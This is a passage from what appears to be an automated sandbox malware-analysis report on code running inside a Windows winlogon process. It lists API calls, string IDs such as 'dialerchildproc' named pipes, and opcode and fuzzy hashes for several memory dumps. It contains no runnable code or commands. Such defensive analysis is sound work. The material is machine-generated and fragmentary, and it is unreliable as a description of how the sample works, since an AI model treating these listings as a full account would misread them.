                                                        • FlsSetValue.KERNEL32(?,?,00000001,00000225DC64ECCC,?,?,?,?,00000225DC64BF9F,?,?,?,?,?,00000225DC647AB0), ref: 00000225DC64CF2C
                                                          • Part of subcall function 00000225DC64D6CC: HeapAlloc.KERNEL32 ref: 00000225DC64D721
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF54
                                                          • Part of subcall function 00000225DC64D744: HeapFree.KERNEL32 ref: 00000225DC64D75A
                                                          • Part of subcall function 00000225DC64D744: GetLastError.KERNEL32 ref: 00000225DC64D764
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF65
                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000225DC650A6B,?,?,?,00000225DC65045C,?,?,?,00000225DC64C84F), ref: 00000225DC64CF76
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast$Heap$AllocFree
                                                        • String ID:
                                                        • API String ID: 570795689-0
                                                        • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction ID: c96d39c070731bccc58dc25472949b9c8324ede58aceb138708ddbc32eb2cb43
                                                        • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                        • Instruction Fuzzy Hash: 3B41AB2C34CE64B6FE68A7FD955D36932825F857B2F24C7A4A937467E6DF388442C200
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 123304303fb7c22e5d95d7b69af9060bb35e9dacbc8375ccdc98a975ab60097a
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 71217F7A614B6092FB14CBA9F54835973A1F789BA6F508215EB5943BA8CF7CC149CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                        • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2171963597-1373409510
                                                        • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction ID: 1de5ddcc8f1dfc1167620b25f9dc58926eb66b08d3309719a253bb24b32ba1e0
                                                        • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                        • Instruction Fuzzy Hash: 8E215679628F5093F710CBA9F54835977A1F785796F608215DB5903BA4CF7CC145CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: 555fb57b5e2f5e687e313f4fed1146f863cabed64c72fa6e629389c121d24878
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 23E1C77A604F50AAFB60DFADD44839D77A0F745799F309116EE8997B9ACB34C182CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139211755.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc610000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: ccd8efdbd64409059a3f17658d38d7afc50ea8cd74631e28eb6d2bb9e49f1cd4
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: F3E1D37A602F609AEF60DFA9D48839D77E0F749B8BF108115EE8947B99CB34C592C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3140545005.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc670000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction ID: 79a22f26d4f7f371d14ec50af5f62361132822db574cad1d617c9f743099e6d3
                                                        • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                        • Instruction Fuzzy Hash: 18E1C17A600F609AEB60DFA9D48839D77E0F749B9AF108915EE8957FD9CB34C492C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: bf4187be2395a619f89a1bc8f3fca4df6631bddcfcdd61a4c67bb6d669326bcb
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: 65E1A47A60CF60AAFB60DFA9D44839D77A4F745799F208155EE8A57B9ACB34C082C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 17cc71c834340602f80b56e8e75482b2e164db3fe2ea15b9f73ab924f287fe61
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: 4A41C22A311F20A5FB16CBAEA9087553391FB45BA2F258129AE0EC7785EF38C445C316
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction ID: 4194e3e7209c85e71950454c05d0e0ffaf74f2fe4e207fa6d649fb1745087b51
                                                        • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                        • Instruction Fuzzy Hash: E541F42A32DE20B1EB56CBEEA9087553391BB49BE2F15C125AD0F87785EF38C445C315
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: 5a3c0a9bbafb0f78905138bbf46c57f4a34e7ddab14eac61c3c20f9c737e8ad5
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: 9B418077214F94D6E764CFA5E44839E77A1F388B9AF148129DB8947B58DF38C849CB00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction ID: d1ef6154134f3d25a2e3b62082cc3c12da5f52964662e2438e80bc3b6bcb4469
                                                        • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                        • Instruction Fuzzy Hash: B6418077218F94D6E760CFA5E44879E77A1F388B99F148129DB8A07B58DF38C449CB00
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC6AC7DE,?,?,?,?,?,?,?,?,00000225DC6ACF9D,?,?,00000001), ref: 00000225DC6AD0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: 2022ee20624ae9fac7997fd3bf5dc1645fffc08433487f268156f8275001b495
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: 6911C468700F6461FA68EBFE5A5D36961415F543F2F34D324A83AC77EADE78C842C201
                                                        APIs
                                                        • FlsGetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D087
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0A6
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0CE
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0DF
                                                        • FlsSetValue.KERNEL32(?,?,?,00000225DC64C7DE,?,?,?,?,?,?,?,?,00000225DC64CF9D,?,?,00000001), ref: 00000225DC64D0F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID: 1%$Y%
                                                        • API String ID: 3702945584-1395475152
                                                        • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction ID: be52c68ba33939f5a848b29d9d21d48e408fdab80177f021fac5a07cf6ddf0ee
                                                        • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                        • Instruction Fuzzy Hash: C111B628B0CE64A1FE6897BED55D32971415B557F2F14C3A4A87B477DADE78C442C200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: f6d16694de95954a0b883b7a0c824403c85fe028b68c945db90d9150eb585885
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: CF81D22D700E21B6FB54EBEDA84D39966D1AB8578BF34D425DA04C77A6DB38C845CF00
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction ID: a54115b046e8042141df28d7bb05dcfe8318faa30d7cb3b304a9c15ab40c91e6
                                                        • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                        • Instruction Fuzzy Hash: 0281362C61CE31AAFB54ABEDA44C39937D1E785782F14C4A4DA0B877A6DB38C845CF00
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 0f4212df039294fefdde6ff96b437b18f0d6b6311749627e01e145e3100ab471
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: F431F429312E20F1EE25DBCAA80875523D4BF48BA2F3985259D1E8B79ADF38C047C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction ID: 1846bb63d11909a53191b25e77548844483a8de6adc9bd3f24389271b0a95010
                                                        • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                        • Instruction Fuzzy Hash: 2131E62935EE60F1EE21DBCAA408B653398BB48BA6F5985259D1F0B798DF39C447C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 6e1e93a200b7bd570fa0b190f4c403581b2cb531a58d9972e87f4823fb88df5f
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 1E11BC35310FA096E7508B9AE848319B7A5F388FE7F088225EB1E877A4CF38C805C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction ID: 158becd88709c9cbcacd230cd8387edf0a13bed790f97ee48f9835d8b457c441
                                                        • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                        • Instruction Fuzzy Hash: 5A119135720F6096E7608BDAE84831977A0F788FE6F248225EB5E877A4CF78C914C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID: wr
                                                        • API String ID: 1092925422-2678910430
                                                        • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction ID: 5626651945d5fb8906f413eb53f91b70d6605e573597d601334c82dde5c84599
                                                        • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                        • Instruction Fuzzy Hash: 40118B2A304F6092EF189BAAE40C269B3A5FB88F86F148038DF8943794EF3DC505C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction ID: 0ad3d618e1835294593f6452ab590f590bc81cd41d15a12307719c1f0daf2064
                                                        • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                        • Instruction Fuzzy Hash: C9D1AC7A208F9895DB70DB4AE49435A7BA0F7C8B89F104116EACD87BA9DF3CC551CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 6d0a1707391fcb5c153528b149007a8a8c9fe1f40df049437015618af4cf0edf
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 5E31B23A781F61A2EA15CF9EE54876967A1FB48B86F18C0309F4C87B55EF34D4A1C300
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: dialer
                                                        • API String ID: 756756679-3528709123
                                                        • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction ID: 2e98920b3895b546e8cfee93848436d20f1d91fbd890dc42e4983bef65e91d92
                                                        • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                        • Instruction Fuzzy Hash: 9131CE2A309F65A2EB52CFDEE54872A77A0FB44B86F18C1209F4A47B55EF34C4A1C300
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 6f9918c3cbd4a8341a5960baa032c6c80083ab5fabd7ed8650c6535314c37da2
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B9119D68300E6061FA68EBFE564D32922426F987B6F30C324A836C77EADE78C441C201
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: Value$ErrorLast
                                                        • String ID:
                                                        • API String ID: 2506987500-0
                                                        • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction ID: 4157702fcb9233f49a77c46e803b27685ba528657f510afb3a862d3f666b09f6
                                                        • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                        • Instruction Fuzzy Hash: B3119D2874CE6071FE64ABFE954D32932426B95BB6F10C3A4A837477EADE78C441C200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: cb2a63c83e44a23da2db583fd32e9b754654e1e9db48b59022d394c89ab082b1
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 99016929300E5092EB18DB9AA89C35963A6FB88BC6F988035DF4D83754DF3CC989C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction ID: c75f4c628c11a50a5007a532dfe706c93d8ee4e04b1e1be502c9ae2a36d6589c
                                                        • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                        • Instruction Fuzzy Hash: 0E016929314E5092EB60DB9AA84C35963A1F788BC6F988075DF8A43754DF3CC989C740
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3141040016.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc6a0000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                        • String ID:
                                                        • API String ID: 449555515-0
                                                        • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction ID: 3adde3a003b7029c84831e13eabd217eaefc6f8cdf697e4629c9387f833a695b
                                                        • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                        • Instruction Fuzzy Hash: FB012969211F60A2EB289BAAE91C71977A1BB59B87F188424CE4947764EF3DC148C704
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000014.00000002.3139707516.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_20_2_225dc640000_winlogon.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
